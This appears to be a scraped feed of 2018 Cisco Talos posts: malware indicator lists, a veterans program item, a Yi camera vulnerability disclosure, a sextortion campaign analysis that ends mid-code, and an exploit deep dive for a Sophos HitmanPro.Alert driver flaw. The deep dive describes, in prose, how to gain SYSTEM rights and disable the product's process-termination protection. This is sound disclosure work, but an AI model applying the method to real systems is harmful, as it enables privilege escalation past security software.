  • 4d6ac5ccca2bab50f296a4e34a7bed16131f01fdf6864c2bee8efbfea449697b
  • 51a9bf24550ec6db0e383fbe1e9089558e1d1bd4e57c5d3678a95233efd59dab
  • 581391e344bda3539189aef8252556f916bf27333e755765641a1485844b884f
  • 66ada213ce8d9756c1c711d216d45ef8cc84586a1dc46213ce8275d4f8a7d08f
  • 7d0ab4517139c8347e39af92cf8dafb9c71e80a8848cea25d7e4598292753fac
  • 7f49ac352ec83b003ca00b29acafdf5c08132f0bd060151312157773e06a887d
  • 8564af9b09f0ade9b372d76a0d53355587b28cc89afec83b9287cebe6dbce148
  • 8cca573e22a563ae4074007c9b5c5abd11316a0235f206242baf4936f3cff4fb
  • 91487940c217c106a1f70ea4f850db083396a8fd5c37e81c47d4cd01ef269906
  • 9813d3fa86989ca43ecc0db5684e642823abebca58161d8676276349bb5c53ea
  • b3be19db0aa19fc9588cb90d0ee5c39ae124e797b82ba1eeb02ba0b82c9a55f8
  • beb78637a890b73e150cc67b1c51108dc89e7b3e491ed22cc81695eda729e10f
  • c405942083f1d75a6de07f9270e94594cfd99b59c774f22bd2c214715822a851
  • c5405c94a49bd14155027aea5722bf253eeedd1a3d0d1d73a2580adb70a6def7
  • cc542bacf782757a362d3b6cfc54efe64f8abb860f7c997cf008cc0ae9ffcee6
  • d2f9541628e3178b1e6cead482d9983e1509edd3155244b42ac49f0a6919d690
  • d7ecfd142025e761006a446d1bd68a9f337eaf1f927fbc01fbbe336df39befae

Screenshots of Detection (AMP)


Indicators of Compromise
Registry Keys
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 103[.]235[.]47[.]123
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %SystemDrive%\347749632.exe
File Hashes
  • 0387a6fcadc71d0fd723b94049d312eb81752994f06d6e11a222c20c81d610a8
  • 39ad7614f81cf505be13fb726d9a68585ebcfb4ba3c156e7974e23a71c8254f1
  • 41569db09055ec3bbd900f943c3049b6362be1fc08e73bf9403c6e0a684b5aed
  • 7f25aa88bb56ce9888d3959344307b5c7423f53ef1409f84534dd82f2520eb92
  • 856c90d502181b0297d792c67ab0d5e3d78fac4879e853beab00e10707e1c5dd
  • 99e9c70014473728f7cfac4704c4961cb9cf1e6cb015bb1da6bb095fea13ecaa
  • a4143241cfa447db8fa7d4ec5ef79a6bd0a78b853d8f461f209e1224ea09f34f
  • e957fa484e5b1b1c84a0f4d3e3561686fe6d289f703ec2ff1f4d9fec886e1344
  • f57061d301bce0ecb0b1caf8b0e0de238ecccd4f038f4e9a397ab1cdde57e9a2
  • fd047bf2512554e75ffe684d07d0cb5ee798409fb504e2db7a13b90cfc7070e0

Screenshots of Detection (AMP)


Indicators of Compromise
Registry Keys
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 212[.]58[.]244[.]48
  • 208[.]91[.]197[.]13
Domain Names contacted by malware. Does not indicate maliciousness
  • lalecitinadesoja[.]com
  • downloads[.]bbc[.]co[.]uk
Files and or directories created
  • %LocalAppData%\Temp\1ii4ushk.rdy.ps1
  • %LocalAppData%\Temp\i3iu3ax4.unx.psm1
  • %AppData%\23C.exe
File Hashes
  • 05997180a42ca9c01720b1ee3e759bd1a408c0064bbdac0c72f56c9783102a1f
  • 07a8a906e93699e23b1b7fe6a190edf709d499efdb806a334d63d21e87d47fea
  • 0d4e2eeb6402ecbfed9d9f70a4386ba988d96baa4570944ad7d25fda4e1360b5
  • 1007b22475717247803c61a571c881bf50d93199f21559bfaa2b0651e3e88b99
  • 11cd2e32f5b99a2988d75e7c6b7b372645385fa0b2f266084cf79a674fa87d54
  • 12cb9af05b67398d8e32296f872fcf38485cb5bfb248882a039c901f917744c7
  • 199abec0369aa5b56ccf3e40104dec650c0c621a4bf9fe892cde4c649951d96c
  • 2436eb88be5cb4536470f00aa4e0b2204c938a7ccc1ab1512c51371c056083bb
  • 2b99f6c10d40f9437e4f81c102829e5dd177b7ba83f04d0b09ca13fd35d4f37a
  • 2e1d18fa4a0c1b7f1a840f0cbe366bed742fd882ba5ba7c32177fe4384d3feeb
  • 2fcb4649130e60c9ee30bc0109dd276dfc20b58873098466740c95bae14e8b16
  • 2fda76c3f4db61bd48ffefbe06625cbf33c84c9a99bfb5e4b078efab041786be
  • 4c7833eda85621233fcf983d797da0a473e4d17bc8a6b5572eb475e1132f9604
  • 4cf4a24b619e53b5155e2aa5eebcbd4a935b03bc2a99f703e955d26bfdc89834
  • 522dea36276bb7616dabda4f46e9bd93fb5fac7dc8c035e2677febac8a9ac268
  • 53bfd8dcca2dd1a702c80a92e52b6149c3b6d9dd69cfc616c6ece3931920aa0b
  • 56ee72c3cac7e50c20945307e9f58360e097782ee10a5577323f1cee22caeb3d
  • 5b8a7e111e05c20e9499e8a06ea17582b95ae8c8a780406b6969a40886b614b7
  • 5dfef0b6f4f1b612edf80c8ab5cffc7556677bb07c53934963b550b60cf84474
  • 6534a9d590748b2301a3f804b75fe02ffee39acf82d2dbb93800a3f8923c9934
  • 6b83c696d85d8f467ee9ff306ef266c6b64c8cb4e0aad99f4b5627f6e2dd3c33
  • 6c891decc602dc22ae6084be690674afdb405c5b7072a0e8b46d77ba8e331237
  • 6da86b5ba028ddfd9646da6467cdaca4d698b72b165045561bcf7a65449dba85
  • 7546344c7c370e86f9975710269a9c965104d6084fe4b51d8713c37cd277c2da
  • 75a14beabec965f401a21c1809b7fe9563ced7366c863e78dd5c744516aea83d

Screenshots of Detection (AMP)




Indicators of Compromise
Registry Keys
  • N/A
  • qazwsxedc
IP Addresses contacted by malware. Does not indicate maliciousness
  • 52[.]1[.]22[.]171
Domain Names contacted by malware. Does not indicate maliciousness
  • www[.]easycounter[.]com
Files and or directories created
  • %WinDir%\cer61A0.tmp
  • %TEMP%\adminpak.msi
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\C5MZMU22\adminpak[1].exe
  • %WinDir%\cluster\clcfgsrv.inf
  • %WinDir%\cluster\cluadmin.exe
File Hashes
  • 04a44c6f9ee4b5f944038452d2669a9915e493f3d4aedd8603af6bcbf9fb157d
  • 075ef3a40de2c10d52140c02fc604654e60eb1231659122640d93884a8f639d8
  • 1ed41ccdce4f7c67dbeb57873ed69a0b53bd8c509a66f391fb4838cd26d32f88
  • 4e8da970321ee8e38f2fe918ce8755ce504d0c54ad579c7a2d388ed65aceca3f
  • 63562fa34ca55cbbc1f007ed6a199b625f277f02487d18c6a9a8e24354af6ea3
  • 72b02849c7cde8ba42dfe04edf18b0ede900c66187a9e38f5d16eaf84ddfbfbe
  • 764947d95583d3a134fc96d6ce06ce4175261d3b9b48d224238367054e187d93
  • 77515fa3f7bea9043e954ac8cb13917edd930d0e5d87f2cbc9fa4d44bd281161
  • 7ea545f0dd17684011d7bbdde7c004faccacd8edb6d011c4e023f2780279ae1f
  • 92e4863e96df84117c1288ceb692823a6d86c0b3a09f29a5cbc4af6a83a03415
  • 9d267ed7cc3efe21afd96a3717cf920376048528e7094c54defb915afbe96a80
  • a36d16238efb3b5f2ba5e9c23dd1db26a6b08fce8fa1d824e3006bc05f12a75f
  • b63310bff942d0fe4f131fbb777737b110ab630876e784ac843e0c4dcdebde44
  • bdc574d0160c6566738b039122d702a47aa10080b096cc3ca2729a2a5ca5f6f6
  • cf7236e1d8783d00cd54d9d821a1067a2c08cd7cb67b0c091f5826784403f67a
  • d7096f8904ebef796193afca1737f99e65c07ac7cf3c999aa46b5e60428ca006
  • dba090f098676f7f4d5bd9e71a5b24cb1dfc71edb6b8a0dc06082a60730a81d0
  • ed2893a0c58fbfaf73acdd4d7a7c9d8626e8609573739e8f0bf11c88d4b07303
  • f9de2da81894bbde4f6baf5909c3f3f6a5d5fc61a8df97836fb8db14fbdb6006
  • ff453440448d5f950a573ab246092a3c80e33c7c9189d97d15539bf09c48211d

Screenshots of Detection (AMP)


CyberVets U.S.A.: The mission after transition

Thu, 01/11/2018 - 16:48
Christopher Marshall, a veteran of the U.S. Navy, currently serves as Director of Cybersecurity Research for Cisco Talos Intelligence Group.

As a veteran of the U.S. Navy, I’ve had the opportunity to use some of the greatest technology this country has to offer — from night vision goggles, to thermal cameras, to radio and satellite command and control equipment — even the care and feeding of nuclear reactors. When it was time for me to transition from the military to the civilian world, my post-military career led me to work for the Cisco Talos Intelligence Group, where I’ve found that many who served are also excellent teammates in the fast-paced, ever-shifting domain of cybersecurity. These men and women exhibit leadership, teamwork, inclusion, integrity, efficiency, and (importantly) the ability to acquire technical prowess. These are highly desirable traits in any industry, especially one that is predicated on trust and a willingness to always learn and evolve.

Within the next few years, we are facing the global reality of nearly 2 million unfilled cybersecurity jobs, which poses a threat to our national security, businesses and the local community. At Cisco, and Talos in particular, we recognize the value veterans bring to the workplace. We strive to create opportunities for the training, hiring and advancement of veterans because of the intangibles they bring with them. A major obstacle we face in that endeavor is how to support the military community as they transition to the civilian workforce at a rate of over 200,000 each year. In November 2016, Virginia announced the Virginia Veterans Cyber Training (VVCT) program, or as we at Cisco call it, CyberVets USA. Leading the partnership alongside Amazon Web Services and (ISC)2, Palo Alto Networks, and Fortinet, Cisco launched a free online entry-level cyber training pilot for 200 veterans who want to work in Virginia’s cybersecurity industry.
Today, we are excited to announce a CyberVets USA program in Talos’ backyard here in Maryland with the help of Lt. Gov. Boyd Rutherford, in conjunction with a proclamation to make this November “Hire-a-Veteran Month.” Additionally, NetApp and the National Development group have joined on for the Maryland program. Developed to address a growing talent gap in the cybersecurity arena, CyberVets USA is an industry partnership of cyber-focused companies offering free training and certifications to the military and veteran community. In collaboration with the Departments of Labor, Commerce, and Veterans Affairs, as well as several of Maryland’s state colleges and universities, this program provides the training needed to develop the extrinsic skills to succeed in the cybersecurity workforce while capitalizing on the intrinsic values that hiring veterans brings to the commercial workforce. (To learn more, click here.)
Additionally, in the near future, Cisco will be launching other programs that include a targeted employer matching program, a proprietary matching engine to map military skills and newly earned certifications, linking veterans to the thousands of jobs posted by any one of Cisco’s 60,000 channel partners across the globe.
With the support of the governor’s office and the state of Maryland, the CyberVets USA program will identify, train, and help find next-generation tech jobs for the veteran and transitioning military population of Maryland, giving the vets their next mission after transition. I am proud to continue my journey with a company dedicated to serving those who served and look forward to welcoming veterans as they join the Cisco team.
To learn more, visit

Talos Vulnerability Deep Dive - TALOS-2018-0636 / CVE-2018-3971 Sophos HitmanPro.Alert vulnerability

Thu, 01/11/2018 - 13:00
Marcin Noga of Cisco Talos discovered this vulnerability.

After disclosing two vulnerabilities in Sophos HitmanPro.Alert on Thursday, Cisco Talos will show you the process of developing an exploit for one of these bugs. We will take a deep dive into TALOS-2018-0636/CVE-2018-3971 to show you the exploitation process.

Sophos HitmanPro.Alert is a threat-protection solution based on heuristic algorithms that detect and block malicious activity. Some of these algorithms need kernel-level access to gather the information they require, so the software's core functionality is implemented in Sophos' `hmpalert.sys` kernel driver. This post shows how an attacker could leverage TALOS-2018-0636 to build a stable exploit that gains SYSTEM rights on the local machine.

Vulnerability Overview
During our research, we found two vulnerabilities in the `hmpalert.sys` driver's I/O control handler. For the purposes of this post, we will focus only on TALOS-2018-0636/CVE-2018-3971, an escalation-of-privilege vulnerability in Sophos HitmanPro.Alert. First, we will turn it into a reliable write-what-where primitive, and then into a fully working exploit.

First, we use the `OSR Device Tree` tool (Figure 1) to analyze the `hmpalert.sys` driver's device access rights.

Figure 1. Device Tree application showing hmpalert device privilege settings

We can see that any user logged into the system can obtain a handle to the `hmpalert` device and send I/O requests to it. Keep in mind that, as mentioned in the original vulnerability blog post, the I/O handler related to this vulnerability is triggered by the IOCTL code `0x2222CC`. The vulnerable code looks similar to the one below.

Figure 2. Body of a vulnerable function
The nice thing is that we fully control the first three parameters of this function, but we do not fully control the source data: the `srcAddress` needs to point to a memory area belonging to the lsass.exe process (line 12).

Additionally, data read from the lsass.exe process (line 23) is copied to the destination address the `dstAddress` parameter is pointing to (line 33).

With this basic information, we can construct the first proof of concept exploit to trigger the vulnerability:

Figure 3. Minimal proof of concept to trigger the vulnerability
This looks like it could work, but it is not enough for a fully working exploit. We need to dig into the `inLsassRegions` function and see exactly how the `srcAddress` parameter is tested. We have to check whether we can predict the memory content there and so turn our limited `arbitrary write` access into a full `write-what-where` primitive.

Controlling the source
We need to dive into the `inLsassRegions` function to get more information about the `srcAddress` parameter:

Figure 4. The function responsible for checking if the `srcAddress` variable fits in one of the defined memory regions.

We can see that the code iterates over the elements of the `memoryRegionsList` list, each represented by a `memRegion` structure. The structure is quite simple: it contains a field pointing to the beginning of the region and a second field holding the size of the region. The `srcAddress` value needs to fall within the boundaries of one of the `memoryRegionsList` elements. If it does, the function returns 'true' and the data is copied.

The function returns 'true' as long as the `srcAddress` value itself falls within the boundaries (line 21). If the `srcSize` value is larger than the space remaining in the region, the `srcSize` variable is clamped to the available size (line 26). The question is: what exactly do these memory regions represent? The `initMemoryRegionList` function gives us an idea.

Figure 5. Initialization of memory regions list.

We can see that the current thread's context is switched to the `lsass.exe` process address space and then the `createLsaRegionList` function is called:

Figure 6. Various memory elements of the lsass.exe processes are added to the memory regions list.
Now we can see that the memory regions list is filled with elements taken from the `lsass.exe` PEB structure. The ImageBase addresses of the loaded and mapped DLLs are added to the list together with their SizeOfImage (line 31), along with other information. Unfortunately, the `lsass.exe` process runs as a system service, so with normal user rights we cannot read its PEB. We can, however, use what we know about the mapped DLLs: system DLLs such as `ntdll.dll` are mapped at the same address in every process (Windows randomizes system DLL bases once per boot, not per process), so we can copy bytes from the `lsass.exe` process's copy of these system DLLs into the memory location pointed to by the `dstAddress` parameter. With that in mind, we can start creating our exploit.

This is not a typical `write-what-where` vulnerability of the kind seen in exploitation training classes, but we do not need to be very creative to exploit it. The exploitation process presented here is based on research presented by Morten Schenk at the Black Hat USA 2017 conference, with modifications from Mateusz "j00ru" Jurczyk from his paper "Exploiting a Windows 10 PagedPool off-by-one overflow (WCTF 2018)." With a few changes, we can use j00ru's code, WCTF_2018_searchme_exploit.cpp, as a template for our exploit. These changes include:
  1. Removing all code related to pool feng shui.
  2. Writing a class for memory operations using the primitives found in the hmpalert.sys driver.
  3. Updating the important exploit offsets for the ntoskrnl.exe and win32kbase.sys versions in use.
Then we can use the strategy from Morten and Mateusz:
  1. Leak the addresses of certain kernel modules using the NtQuerySystemInformation API. We assume that our user operates at the `Medium IL` level.
  2. Overwrite the function pointer inside `NtGdiDdDDIGetContextSchedulingPriority` with the address of `nt!ExAllocatePoolWithTag`.
  3. Call `NtGdiDdDDIGetContextSchedulingPriority` (`= ExAllocatePoolWithTag`) with the `NonPagedPool` parameter to allocate writable and executable memory.
  4. Write the ring-0 shellcode to the allocated memory buffer.
  5. Overwrite the function pointer inside `NtGdiDdDDIGetContextSchedulingPriority` with the address of the shellcode.
  6. Call `NtGdiDdDDIGetContextSchedulingPriority` (`= shellcode`).
  7. The shellcode escalates our privileges to SYSTEM by copying the security TOKEN from the System process to our process.
Test environment
Tested on Windows: Build 17134.rs4_release.180410-1804 x64 Windows 10

Vulnerable product: Sophos HitmanAlert.Pro 3.7.8 build 750

Memory operation primitives
To simplify memory operations, we wrote a class using the found memory operation primitives in the hmpalert.sys driver.

Figure 7. The memory class implementation
The core `copy_mem` method is implemented like this:

Figure 8. The Memory::copy_mem method implementation

We initialize a couple of important elements inside the class constructor:

Figure 9. The memory class constructor implementation
We can use the `write_mem` method to write a certain value to a specific address:

Figure 10. The memory class write_mem method implementation

We cannot directly copy the bytes defined in the `data` argument. Therefore, we need to search for each byte of the `data` argument in the mapped `ntdll.dll` image and then pass the address of that byte to the hmpalert driver via the `srcAddress` parameter. That way, byte by byte, we overwrite the data at the destination address `dstAddress` with the bytes defined in the `data` argument. Using this class, we can easily overwrite the necessary kernel pointers and copy our shellcode to the allocated page:

Figure 11. Shellcode copy operation to an allocated page.
The rest of the exploit is straightforward, so we can leave the implementation as a task for the interested reader.

Fail — Zero-day protection really works!
Armed with a fully working exploit, we are ready to test it. If it works, we should get SYSTEM level privileges.

Figure 12. The elevated console is detected and terminated by HitmanPro.Alert.

It looks like our exploit has been detected by HitmanAlert.Pro's anti-zero-day detection engine. Looking at the exploit log, it seems that its entire code was executed, but the spawned elevated console has been terminated.

Figure 13. At the end of the exploit, the console with elevated rights is executed.
We can see in the system event log that HitmanAlert.Pro logged an exploitation attempt and classified it as a local privilege escalation:

Figure 13. Event log showing that it was logged by HitmanAlert.Pro as an attempted privilege escalation.

Using a zero-day to bypass anti-zero-day detection
We know that our exploit works correctly, but the problem is that it's terminated by the anti-exploitation engine during an attempt to spawn the elevated shell.

We can look at HitmanAlert.Pro's engine to find out where this process-termination logic is implemented. The Microsoft Windows API provides `PsSetCreateProcessNotifyRoutine`, which can be used to monitor process creation in the OS. Searching for this API call in the `hmpalert.sys` driver, IDA shows a couple of calls.

Figure 14. Registration of `ProcessNotifyRoutine` via the `PsSetCreateProcessNotifyRoutine` API.

We do see some places where it registers the callback routine. Let's look into the implementation of `ProcessNotifyRoutine`. While stepping through it, we found the following code:

Figure 15. An implementation of the `ProcessesKiller` function, responsible for the termination of potentially malicious processes.

At line 44, you can see a call to the routine that's responsible for killing "dangerous/malicious" processes. As we can see at line 5, there is a condition checking whether a global variable `dword_FFFFF807A4FA0FA4` is set. If it is not set, the rest of the function code will not be executed. All we need to do is overwrite the value of this global variable with zero to avoid termination of our elevated console. The final portion of the exploit looks like this:

Figure 16. Overwriting a global variable in the `hmpalert.sys` driver to trick the `ProcessesKiller` function, allowing our spawned elevated console to execute.
Time to test our exploit in action.

Final exploit - LPE Windows 10 x64 / SMEP bypass

Due to the many anti-exploitation features in today's operating systems, weaponizing vulnerabilities can often be arduous, but this particular vulnerability shows that we can still use some Windows kernel-level flaws to easily exploit bugs in modern Windows systems. This deep dive showed how an attacker could take a vulnerability and weaponize it into a stable, usable exploit. Talos will continue to discover and responsibly disclose vulnerabilities on a regular basis and provide additional deep-dive analysis when necessary. Check out our original disclosure here to find out how you can keep your system protected from this vulnerability.

Vulnerability Spotlight: Multiple Vulnerabilities in Yi Technology Home Camera

Wed, 31/10/2018 - 18:18
Vulnerabilities Discovered by Lilith [x_x] of Cisco Talos.


Cisco Talos is disclosing multiple vulnerabilities in the firmware of the Yi Technology Home Camera. In order to prevent the exploitation of these vulnerabilities, Talos worked with Yi Technology to make sure a newer version of the firmware is available to users. These vulnerabilities could allow an attacker to gain remote code execution on the devices via a command injection, bypass methods of network authentication, or disable the device.

The Yi Home Camera is an internet-of-things (IoT) home camera sold globally. The 27US version is one of the newer models sold in the U.S. and is the most basic model out of the Yi Technology camera lineup.

It includes all the functions that one would expect from an IoT device, including the ability to view the camera's feed from anywhere, offline storage, subscription-based cloud storage and easy setup.

There are many consequences to a security vulnerability within the firmware of this security camera. An attacker could exploit these vulnerabilities to:

  • Disable the camera to prevent it from recording.
  • Delete stored videos on the camera.
  • View video feeds from the camera.
  • Potentially launch attacks against the camera owner's phone app.
  • Act as a foothold into the home network to attack other devices inside.

This list is not complete, and many other consequences could occur, so Talos highly recommends that the devices are patched as soon as possible via the Yi Home application.


Due to the nature of IoT devices, more attack surfaces are available on a given device than in a typical server or client program. For half of the vulnerabilities, physical access is required to exploit them, which obviously makes them less of a concern if the camera is stored safely inside the venue it is protecting, but for the other five vulnerabilities there is a network attack vector, raising their severity and the importance of getting the latest firmware.

Before summarizing these network-based vulnerabilities, it is important to note that they are all made possible by TALOS-2018-0616, as all of these vulnerabilities are over cleartext protocols, either unencrypted UDP or HTTP. If the slight performance hit was taken to implement the core network functionality over HTTPS, these vulnerabilities would either not have been as severe, or not have been exploitable at all.

Denial of service:

TALOS-2018-0602 and TALOS-2018-0595 were both found within the p2p_tnp binary, which is the main controller for phone-to-camera and cloud-to-camera communication. That binary also implements a custom UDP peer-to-peer (p2p) protocol for all of the aforementioned features. In both vulnerabilities, some opcodes that appear to be leftover artifacts could be accessed without authentication, which would allow an attacker to either permanently disable the video feed or cause unlimited memory to be allocated, both rendering the camera useless.

Remote Code Execution:

TALOS-2018-0567 is easily the most severe vulnerability out of the batch, requiring only the ability to respond to an HTTP request from the camera in order to hit a command injection and subsequent code execution. The vulnerable time_sync request happens extremely often as soon as the device connects to the network.

Administrative Access:

The last of the network-based vulnerabilities, TALOS-2018-0601, allows an attacker to reuse tokens that can be sniffed over the wire via TALOS-2018-0616, so that one sniffed token can be used an unlimited number of times by an attacker to access the p2p_tnp API that is normally reserved for the camera's owner via the Yi Home phone application. This access only lasts until the device reboots, at which point another token needs to be sniffed.

Physical and Local Attack Vectors:

As noted above, IoT devices tend to lend themselves to vulnerabilities with more unusual attack vectors, and the Yi Home Camera is no exception. Vulnerabilities were found via the firmware update functionality (TALOS-2018-0565, TALOS-2018-0584 and TALOS-2018-0566), the SSID that the camera connects to for wireless access (TALOS-2018-0580) and via the QR code that is used when setting up the device out of the box (TALOS-2018-0572 and TALOS-2018-0571). Because of this, it is suggested that these devices are not kept in areas where they are physically available to others, and once again, that the devices' firmware is updated as soon as possible.

Vulnerability Summaries

TALOS-2018-0565 -- Yi Technology Home Camera 27US Firmware Update Code Execution Vulnerability

An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US. A specially crafted file can cause a logic flaw and command injection, resulting in code execution. An attacker can insert an SD card to trigger this vulnerability.

TALOS-2018-0566 / CVE-2018-3891 - Yi Technology Home Camera 27US Firmware Downgrade Vulnerability

An exploitable firmware downgrade vulnerability exists in the firmware update functionality of Yi Home Camera 27US. A specially crafted file can cause a logic flaw, resulting in a firmware downgrade. An attacker can insert an SD card to trigger this vulnerability.

TALOS-2018-0567 -- Yi Technology Home Camera 27US TimeSync Code Execution Vulnerability

An exploitable code execution vulnerability exists in the time syncing functionality of Yi Home Camera 27US. A specially crafted packet can cause a buffer overflow, resulting in code execution. An attacker can intercept and alter network traffic to trigger this vulnerability.

TALOS-2018-0571 / CVE-2018-3898-CVE-2018-3899 - Yi Technology Home Camera 27US QR Code trans_info Code Execution Vulnerability

An exploitable code execution vulnerability exists in the QR code-scanning functionality of Yi Home Camera 27US. A specially crafted QR code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability.

TALOS-2018-0572 / CVE-2018-3900 - Yi Technology Home Camera 27US QR Code Base64 Code Execution Vulnerability

An exploitable code execution vulnerability exists in the QR code-scanning functionality of Yi Home Camera 27US. A specially crafted QR code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability.

TALOS-2018-0580 / CVE-2018-3910 - Yi Technology Home Camera 27US cloudAPI SSID Code Execution Vulnerability

An exploitable code execution vulnerability exists in the cloud OTA setup functionality of Yi Home Camera 27US. A specially crafted SSID can cause a command injection, resulting in code execution. An attacker can cause a camera to connect to this SSID to trigger this vulnerability. Alternatively, an attacker can convince a user to connect their camera to this SSID.

TALOS-2018-0595 / CVE-2018-3928 - Yi Technology Home Camera 27US Notice_To Denial Of Service Vulnerability

An exploitable denial-of-service vulnerability exists in the UDP network functionality of Yi Home Camera 27US. A specially crafted set of UDP packets can cause the settings to change, resulting in a denial of service. An attacker can send a set of packets to trigger this vulnerability.

TALOS-2018-0601 / CVE-2018-3934 - Yi Technology Home Camera 27US Nonce Reuse Authentication Bypass Vulnerability

An exploitable authentication bypass vulnerability exists in the UDP network functionality of Yi Home Camera 27US. A specially crafted set of UDP packets can cause a logic flaw, resulting in an authentication bypass. An attacker can sniff network traffic and send a set of packets to trigger this vulnerability.

TALOS-2018-0616 / CVE-2018-3947 - Yi Technology Home Camera 27US p2p_tnp Cleartext Data Transmission Vulnerability

An exploitable information disclosure vulnerability exists in the phone-to-camera communications of Yi Home Camera 27US. An attacker can sniff network traffic to trigger this vulnerability.

TALOS-2018-0602 / CVE-2018-3935 - Yi Technology Home Camera 27US CRCDec Denial Of Service Vulnerability

An exploitable denial-of-service vulnerability exists in the UDP network functionality of Yi Home Camera 27US. A specially crafted set of UDP packets can allocate unlimited memory, resulting in a denial of service. An attacker can send a set of packets to trigger this vulnerability.

Versions Tested

The Yi Technology Home Camera 27US version of the firmware was used during the discovery of the vulnerabilities listed above.

Firmware at Yi Technology 


With the increased convenience of IoT devices, a new set of attack vectors arose that have not been as hardened as traditional ones. As such, Talos recommends that users apply these newly available firmware updates in order to ensure their continued and secure operation. This can be done via the Yi Home phone app, which will notify the user of this new firmware upon being opened. It is also recommended that the user checks the device's firmware version after the update, via the phone app, in order to ensure that the update did in fact occur.


The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or

Snort Rules:
46190-46191, 46294-46295, 46780, 46870.

For other vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal here.

To review our Vulnerability Disclosure Policy, please visit this site here.

Anatomy of a sextortion scam

Wed, 31/10/2018 - 12:31
This blog was written by Jaeson Schultz.

Since July, attackers have increasingly been spreading sextortion-type attacks across the internet. Cisco Talos has been investigating these campaigns over the past few months. In many cases the spammers harvested email addresses and passwords from a publicly available data breach, and then used this data to facilitate their sextortion attacks. While the attackers do not actually have any compromising videos showing the victim, the emails claim to have explicit videos that they will distribute if the victim doesn't pay the extortion payment by a certain time. By including the recipient's password along with their demands for payment, the attackers hope to legitimize their claims about having compromising material concerning the victim. While these attacks have been in the wild for months, Talos wanted to take a closer look at some of these campaigns to see why users were being tricked into sending the attackers large amounts of bitcoin despite the attackers' empty threats. By examining some of the sextortion spam campaigns in detail, our researchers were able to gain insight into how these criminals operate.

An example of a sextortion email containing slight changes to the wording of the message body.

Sextortion Campaign Analysis
To facilitate a deeper understanding of sextortion scams, Talos extracted and analyzed messages related to two very similar sextortion spam campaigns. The first spam campaign we analyzed began on Aug. 30, 2018, and the second campaign began Oct. 5, 2018. Both campaigns are still active at the time of writing this blog.

Talos extracted all messages from these two sextortion campaigns that were received by SpamCop from Aug. 30, 2018 through Oct. 26, 2018 — 58 days' worth of spam. Every message sent as a part of these two sextortion campaigns contains a From: header matching one of the following two regular expressions:

From =~ /Aaron\d{3}[email protected]\.jp/
From =~ /[email protected]\d{3}\.edu/

Campaign Totals
In total, SpamCop received 233,236 sextortion emails related to these "Aaron Smith" sextortion campaigns. The messages were transmitted from 137,606 unique IP addresses. The vast majority of the sending IP addresses, 120,659 sender IPs (87.7 percent), sent two or fewer messages as a part of this campaign.

Number of sextortion emails received by SpamCop over time

The sending IPs are distributed among many countries; however, roughly 50 percent of the sextortion messages come from only five countries: Vietnam (15.9 percent), Russia (15.7 percent), India (8.5 percent), Indonesia (4.9 percent) and Kazakhstan (4.7 percent). If some of these countries seem familiar, that may be because India and Vietnam were previously identified as having exceedingly large numbers of machines that are infected with the Necurs botnet, a well-known distributor of many pieces of malware.

Distribution of sender IP addresses by country

Despite sending more than 233,000 email messages as part of these campaigns, the number of unique recipients was actually fairly low. Talos found only 15,826 distinct victim email addresses. This means that the attackers were sending an average of almost 15 sextortion spam messages per recipient. One unlucky victim from our dataset was contacted a staggering 354 times.

Payment demands
Each sextortion spam contains a payment demand. The payment requested by the attackers varies according to the specific campaign, but in this instance, it is a randomly generated number consisting of an integer between one and seven, followed by three zeros ($1,000 - $7,000). These six different payment amounts appear with almost identical frequency across the entire set of emails, suggesting that there was no effort made on the part of the attackers to tailor their payment demands to individual victims.

Cryptocurrency wallets
In addition to the payment demand, each sextortion message also contains a bitcoin (BTC) wallet address to receive the payment from the victim. In total, Talos identified 58,611 unique bitcoin wallet addresses associated with these two spam campaigns. This works out to an average of approximately four sextortion messages per bitcoin wallet. Out of the approximately 58,000 bitcoin wallets, only 83 wallets have positive balances. However, the balances in those 83 wallets add up to 23.3653711 bitcoins, the equivalent of $146,380.31. That isn't too bad considering the attackers have only been distributing this particular scam for roughly 60 days, and do not actually possess any compromising material concerning the victim.

If you look at the number of unique bitcoin wallets and unique victim email addresses seen over time, you can see that the attackers periodically inject their ongoing campaign with fresh data. The number of unique bitcoin wallets tends to peak and then reduce over time, until it peaks again, with another fresh batch of attacker-generated bitcoin wallets. The last major injection of fresh wallet addresses occurred on Oct. 9. The same can be seen regarding unique message recipients over time, with what appears to be a large injection of fresh recipients also occurring around Oct. 9.

Unique versus duplicate bitcoin wallets and recipient email addresses

Unfortunately, as we dug further into the individual bitcoin wallets possessing positive balances, we noticed some oddities regarding the wallet payment amounts. Several wallets had received transfers that fell well under the minimum $1,000 payment that was demanded as part of this specific campaign. The payment amounts were low enough to fall outside the realm of what could be logically explained as a result of fluctuations in the price of bitcoin.

Bitcoin wallet found in the Aaron Smith sextortion spam that contains far less than the minimum demand of $1,000.

Our researchers discovered that some of the wallets used in this attack were also being used in other attacks. The attackers were reusing some of their bitcoin wallet addresses across different spam campaigns.

In light of the attackers' bitcoin wallet reuse, Talos decided to expand our research to include all spam messages that mention "bitcoin," while also possessing a string of 26-35 characters resembling a bitcoin wallet address in the body of the email.
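To show how the campaign statistics above (messages per recipient, messages per wallet, demand distribution) and the wallet-reuse pivot can be reproduced over raw mail, here is an added Python example; it is not Talos's code. The wallet heuristic is the one the post describes (26-35 Base58 characters); the sample messages are constructed, and the `Aaron\d{3}@` From: pattern is an assumed stand-in for the post's regexes, whose domain parts are not reproduced here.

```python
import re
from collections import Counter, defaultdict

# Mainnet bitcoin addresses are Base58 strings (alphabet excludes 0, O, I, l),
# 26-35 characters long and, for P2PKH/P2SH, start with 1 or 3. This is the
# "string resembling a bitcoin wallet address" heuristic from the post.
BTC_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")

# Payment demand in US dollars, e.g. "$3,000" or "$900".
DEMAND_RE = re.compile(r"\$\s?(\d{1,3}(?:,\d{3})+|\d+)")

# Assumed stand-in for the "Aaron Smith" From: patterns; the domain part of
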